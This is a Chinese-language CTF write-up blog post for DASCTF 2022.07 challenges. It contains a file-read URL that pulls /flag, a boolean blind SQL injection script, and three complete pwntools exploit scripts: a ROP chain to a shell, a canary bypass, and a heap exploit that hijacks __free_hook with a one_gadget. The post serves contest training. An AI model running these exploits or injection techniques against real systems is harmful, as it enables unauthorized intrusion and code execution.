2022 DASCTF2022.07赋能赛 部分web pwn wp

前言:给自己两个大嘴巴子,pwn3,一直在用sendline,呜呜,应该send才可以,呜呜呜,卡在这卡了一下午,在一个地方翻了两次(好几次)车呜呜呜呜呜太菜了我

WEB

Ez to getflflag

f12,根据猜测直接查找upload.php

发现有代码

<!--?php
    error_reporting(0);
    session_start();
    require_once('class.php');
    $upload = new Upload();
    $upload--->

查找class.php

f = $_FILES;
        }
        function savefile() {  
            $fname = md5($this->f["file"]["name"]).".png"; 
            if(file_exists('./upload/'.$fname)) { 
                @unlink('./upload/'.$fname);
            }
            move_uploaded_file($this->f["file"]["tmp_name"],"upload/" . $fname); 
            echo "upload success! :D"; 
        } 
        function __toString(){
            $cont = $this->fname;
            $size = $this->fsize;
            echo $cont->$size;
            return 'this_is_upload';
        }
        function uploadfile() { 
            if($this->file_check()) { 
                $this->savefile(); 
            } 
        }
        function file_check() { 
            $allowed_types = array("png");
            $temp = explode(".",$this->f["file"]["name"]);
            $extension = end($temp); 
            if(empty($extension)) { 
                echo "what are you uploaded? :0";
                return false;
            }
            else{ 
                if(in_array($extension,$allowed_types)) {
                    $filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
                    $f = file_get_contents($this->f["file"]["tmp_name"]);
                    if(preg_match_all($filter,$f)){
                        echo 'what are you doing!! :C';
                        return false;
                    }
                    return true; 
                } 
                else { 
                    echo 'png onlyyy! XP'; 
                    return false; 
                } 
            }
        }
    }
    class Show{
        public $source;
        public function __construct($fname)
        {
            $this->source = $fname;
        }
        public function show()
        {
            if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) {
                die('illegal fname :P');
            } else {
                echo file_get_contents($this->source);
                $src = "data:jpg;base64,".base64_encode(file_get_contents($this->source));
                echo "

继续探索

file.php

<!--?php
    error_reporting(0);
    session_start();
    require_once('class.php');
    $filename = $_GET['f'];
    $show = new Show($filename);
    $show--->

发现可以直接读取文件,尝试读取flag,发现可以读取成功

payload:

http://90330b8d-de6c-4e54-bc6f-6c41ed81dedb.node4.buuoj.cn:81/file.php?f=/flag

DASCTF{5f31248c-b20d-423a-baaa-703fb5c8a0a1}

绝地防御

静态页面,f12,翻找js文件,在js文件找到php文件,是个sql注入布尔类型注入,有waf,前台验证,直接burp抓包即可绕过,我这里直接在网上找个exp脚本进行跑了,跑了好久呜呜

exp:

#coding:utf-8
import requests
def database_len():
    for i in range(1,10):
        url = '''http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php'''
        payload = '''?id=1 and length(database())>%s''' %i  #格式化输出字符串
        # print(url+payload+'%23')
        r = requests.get(url+payload)
        if 'admin' in r.text:
            print(i)
 
        else:
            #print('false')
            print('database_length:',i)
            break
database_len()
 
def database_name():
    name = ''
    for j in range(1,9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = "http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php?id=1 and substr(database(),%d,1)='%s'" %(j,i)
            # print(url+'%23')
            r = requests.get(url)
            if 'admin' in r.text:
                name = name+i
                
                print(name)
                
                break
    print('database_name:',name)


database_name()

PWN

eyfor

思路:整数溢出+栈溢出,-1就能绕过,然后就是基础rop

exp:

from pwn import *
p=process("./pwn4")
p=remote("node4.buuoj.cn","27756")
elf1=ELF("./pwn4")
system=elf1.plt['system']
p.sendlineafter("go\n",'\x00'*0x30)
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendline('-1')
buf=0x6010C0
payload2='/bin/sh\x00'+'a'*(0x30-8)+'b'*8+p64(0x000000000040063e)+p64(0x0000000000400983)+p64(buf)+p64(system)
payload='cat flag'+'a'*(0x30-8)+'b'*8+p64(0x4007B7)
sleep(0.5)
p.sendline(payload2)
raw_input()
p.interactive()

MyCanary2

思路:add canary能写成固定的,然后基础栈溢出打后门,leak固定,然后退出返回地址到后门即可

exp:

from pwn import *

p=process('./MyCanary2')
p=remote("node4.buuoj.cn","25051")
def add(code):
    p.sendlineafter("choice\n",'1')
    p.sendlineafter("code:\n",code)

def leak():
    p.sendlineafter("choice\n",'2')

add('a'*0x6c+p32(0x0)+'b'*8+p64(0x40101a)+p64(0x401573))
leak()
p.sendlineafter("choice\n",'3')
p.interactive()

compat

思路:能错误使用free,leak出libc基地址,在add有个任意性写,a1&0x80!=0,写个0xff就能过,这里有个点卡了我一下午,就是在使用read写入数据要用send不能用sendline,因为会多一个0a,这里导致我写了0xff,多出一个0a到下个read,就不能利用下面read,给自己两个大嘴巴子,然后绕过检测就可以利用任意写劫持下个trunk,任意写进tc为freehook,就可以rce了,我好菜,!!!!!

exp:

from pwn import *

def add(data,tag):
    p.sendlineafter("choice: \n",'1')
    p.sendafter("data: \n",str(data))
    p.sendafter("tag: \n",str(tag))
def show(idx):
    p.sendlineafter("choice: \n",'2')
    p.sendlineafter("idx: \n",str(idx))
def dele(idx):
    p.sendlineafter("choice: \n",'3')
    p.sendlineafter("idx: \n",str(idx))
def reset():
    p.sendlineafter("choice: \n",'4')
p=process("./compact")
for i in range(8):
    add("jjjj"+str(i),"\x00")

for i in range(8):
    dele(i)
add('j1','\x00')
add('j2','\x00')

dele(0)
dele(1)
reset()
for i in range(7):
    add("jj"+str(i),"\x00")
add("A"*8,"\x00")
show(7)
p.recvuntil('A'*8)
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x1ecbe0
print hex(libc_base)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL


'''
rce=libc_base+0xe3b01
free_hook=libc_base+libc.sym['__free_hook']
for i in range(8):
    dele(i)

reset()
'''
for i in range(8):
    dele(i)

reset()
'''
add("aaaa","\x00") # 0
add("jsjs","\x00") # 1
payload="\x00"*0x60+p64(0)+p64(0x91)
add(payload,"\xff") # 2
p.send("\x00"*3+"\x90")
add("jsjs","\x00") # 3
add("jsjsjs","\x00") # 4
dele(0)
dele(1)
dele(3)
dele(2)
reset()
payload=p64(0)*3+p64(0x21)+p64(free_hook+0x90)+2*p64(0)+p64(0x91)+p64(free_hook)
add(payload,"\x00") # 0
add("aaaaaa","\x00") # 1
gdb.attach(p)
add(p64(rce),'\x00')
gdb.attach(p)
dele(4)
reset()
p.interactive()

总结:题不难,就是需要仔细,这俩字仔细基本上每次比赛都提醒自己就是不注意呜呜呜!!!!!!

本文链接:

http://blog.azly.top/index.php/archives/80/
1 + 3 =
快来做第一个评论的人吧~